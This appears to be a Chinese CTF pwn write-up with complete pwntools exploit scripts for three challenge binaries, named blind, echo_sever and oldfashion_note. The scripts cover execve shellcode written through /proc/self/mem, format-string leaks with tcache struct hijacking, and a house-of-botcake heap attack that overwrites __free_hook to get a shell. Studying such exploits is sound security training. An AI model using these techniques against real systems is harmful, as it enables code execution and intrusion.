简简单单,轻轻松松,真的不想多说啥了

blind

方法很多。
通过mem的写入是无视权限的,直接把text段这些改成shellcode就行。
或者,打一打exit hook这些啊,随便怎么写都能通......

from pwn import *
from hashlib import *
context.arch = 'amd64'
context.log_level = 'debug'

s = remote('chuj.top', 51759)
libc = ELF('./libc-2.27.so')
ld = ELF('./ld-2.27.so')

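def getYZM(s64):
	"""Solve the service's SHA-256 proof-of-work gate.

	The server sends the hex digest of a 4-character alphanumeric string and
	expects that string back before it talks to us.  The search order is the
	same as before (lowercase, uppercase, digits), so the first match is
	unchanged.

	Args:
		s64: 64-character hex digest from the server, as ``bytes`` or ``str``.

	Returns:
		The matching 4-character candidate as ``bytes`` (ready to send), or
		``None`` if no candidate over the alphabet produces ``s64``.

	Raises:
		ValueError: if ``s64`` is not exactly 64 characters long.
	"""
	from itertools import product

	table = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
	target = s64.decode() if isinstance(s64, bytes) else s64
	# Raise instead of assert: asserts vanish under `python -O` and the
	# length check is real input validation, not a debugging aid.
	if len(target) != 64:
		raise ValueError(f"expected a 64-character hex digest, got {len(target)} characters")
	for chars in product(table, repeat=4):
		candidate = "".join(chars).encode()
		if sha256(candidate).hexdigest() == target:
			return candidate
	return None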

sh=s.recvuntil(" == ")
s64=s.recvline(keepends = False)
s.sendafter("> ", getYZM(s64))

s.recvuntil("the address of the function write: ")
write_addr = int(s.recv(14), 16)
success("write_addr:\t" + hex(write_addr))
libc.address = write_addr - libc.sym['write']
success("libc_base:\t" + hex(libc.address))

s.sendafter(">> ", b'/proc/self/mem\x00')

s.sendafter(">> ", str(libc.sym['puts']))

shellcode = """
	mov rbx, 0x68732f6e69622f
	push rbx
	push rsp
	pop rdi
	xor esi, esi
	xor edx, edx
	push 0x3b
	pop rax
	syscall
"""
s.sendlineafter(">> ", asm(shellcode))
'''
s.sendafter(">> ", str(libc.address + 0x3e7738))
s.sendlineafter(">> ", p64(libc.address + 0x4f432))
'''
s.interactive()

echo_sever

官方wp格式化字符串硬改,弄得贼麻烦,搞不懂,直接劫持tcache struct就秒了...

from pwn import *
import string
from hashlib import sha256
context(arch = 'amd64', os = 'linux', log_level = 'debug')

#io = process("./echo")
io = remote("chuj.top", 52235)
#libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
libc = ELF("./libc-2.31.so")

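table = string.digits + string.ascii_letters
io.recvuntil(" == ")
tar = io.recv(64).decode()
success("tar:\t" + tar)

# Proof-of-work gate: the server wants the 4-character string over `table`
# whose SHA-256 hex digest equals `tar`.  product() walks the candidates in
# the same digits-then-letters order the nested loops did, so the first hit
# is unchanged, and the break-flag bookkeeping is gone.  `prefix` stays ""
# when nothing matches, exactly as before.
from itertools import product

candidates = map("".join, product(table, repeat=4))
prefix = next((c for c in candidates if sha256(c.encode()).hexdigest() == tar), "")
success("prefix:\t" + prefix)
io.sendlineafter("> ", prefix.encode())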

io.sendlineafter(">> ", str(0x20))
io.sendline(b'%13$p')
io.recv(2)
libc.address = int(io.recv(12), 16) - 243 - libc.sym['__libc_start_main']
success("libc_base:\t" + hex(libc.address))

io.sendlineafter(">> ", str(0x20))
io.sendline(b'%6$p')
io.recv(2)
stack_addr = int(io.recv(12), 16) - 0x10
success("stack_addr:\t" + hex(stack_addr))

io.sendlineafter(">> ", str(0x20))
io.sendline(b'%1$p')
io.recv(2)
heap_base = int(io.recv(12), 16) - 0x2a0
success("heap_base:\t" + hex(heap_base))

io.sendlineafter(">> ", str(0x20))
payload = b'%' + str(stack_addr & 0xffff).encode() + b'c' + b'%6$hn'
io.sendline(payload)

io.sendlineafter(">> ", str(0x20))
payload = b'%' + str((heap_base & 0xffff) + 0x10).encode() + b'c' + b'%10$hn'
io.sendline(payload)

io.sendlineafter(">> ", str(0x280))
payload = p64(0)*2 + p64(1) + p64(0)*21 + p64(libc.sym['__realloc_hook'] - 8)
io.sendline(payload)

io.sendlineafter(">> ", str(0))

io.sendlineafter(">> ", str(0x90))
io.sendline(b'/bin/sh\x00' + p64(libc.sym['system']))

io.sendlineafter(">> ", str(0x233))
io.interactive()

oldfashion_note

一个house of botcake模板题,没啥好说的,官方题解用的fastbin reverse into tcache,也行。

from pwn import *
from hashlib import *
context.arch = 'amd64'
context.log_level = 'debug'

#s = process('./note')
s = remote('chuj.top', 51371)
#libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
libc = ELF("./libc-2.31.so")

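def getYZM(s64):
	"""Solve the service's SHA-256 proof-of-work gate.

	The server sends the hex digest of a 4-character alphanumeric string and
	expects that string back before it talks to us.  The search order is the
	same as before (lowercase, uppercase, digits), so the first match is
	unchanged.

	Args:
		s64: 64-character hex digest from the server, as ``bytes`` or ``str``.

	Returns:
		The matching 4-character candidate as ``bytes`` (ready to send), or
		``None`` if no candidate over the alphabet produces ``s64``.

	Raises:
		ValueError: if ``s64`` is not exactly 64 characters long.
	"""
	from itertools import product

	table = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
	target = s64.decode() if isinstance(s64, bytes) else s64
	# Raise instead of assert: asserts vanish under `python -O` and the
	# length check is real input validation, not a debugging aid.
	if len(target) != 64:
		raise ValueError(f"expected a 64-character hex digest, got {len(target)} characters")
	for chars in product(table, repeat=4):
		candidate = "".join(chars).encode()
		if sha256(candidate).hexdigest() == target:
			return candidate
	return None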

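def add(index, size, content):
	"""Drive the note service's "add" menu entry (option 1).

	Args:
		index: Slot number to create; sent as decimal text.
		size: Requested note size; sent as decimal text.
		content: Raw ``bytes`` written into the note, sent without a trailing newline.
	"""
	s.sendlineafter(b'>> ', b'1')
	# Encode explicitly so every send hands pwntools bytes, matching the
	# b'>> ' prompts and the other menu helpers instead of relying on
	# implicit str->bytes conversion.
	s.sendlineafter(b'>> ', str(index).encode())
	s.sendlineafter(b'>> ', str(size).encode())
	s.sendafter(b'>> ', content)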

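def show(index):
	"""Drive the note service's "show" menu entry (option 2).

	Args:
		index: Slot number to display; sent as decimal text.
	"""
	s.sendlineafter(b'>> ', b'2')
	# Encode explicitly so the send is bytes like the menu choice above.
	s.sendlineafter(b'>> ', str(index).encode())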

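def delete(index):
	"""Drive the note service's "delete" menu entry (option 3).

	Args:
		index: Slot number to free; sent as decimal text.
	"""
	s.sendlineafter(b'>> ', b'3')
	# Encode explicitly so the send is bytes like the menu choice above.
	s.sendlineafter(b'>> ', str(index).encode())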

sh=s.recvuntil(b") == ")
s64=s.recvline(keepends=False)
s.sendline(getYZM(s64))

for i in range(7):
	add(i , 0x90 , b'a')
add(7 , 0x90 , b'a')
add(8 , 0x90 , b'a')
add(9 , 0x90 , b'a')


for i in range(7):
	delete(i)

delete(7)
delete(8)

show(7)
libc_base = u64(s.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00')) - 96 - 0x10 - libc.sym['__malloc_hook']
success(hex(libc_base))
system_addr = libc_base + libc.sym['system']
__free_hook = libc_base + libc.sym['__free_hook']

add(10 , 0x90 , b'a')
delete(8)

payload = b'a'*0x90 + p64(0) + p64(0xa1) + p64(__free_hook)
add(11 , 0xb0 , payload)

add(12 , 0x90 , b'/bin/sh\x00')
add(13 , 0x90 , p64(system_addr))
delete(12)
s.interactive()
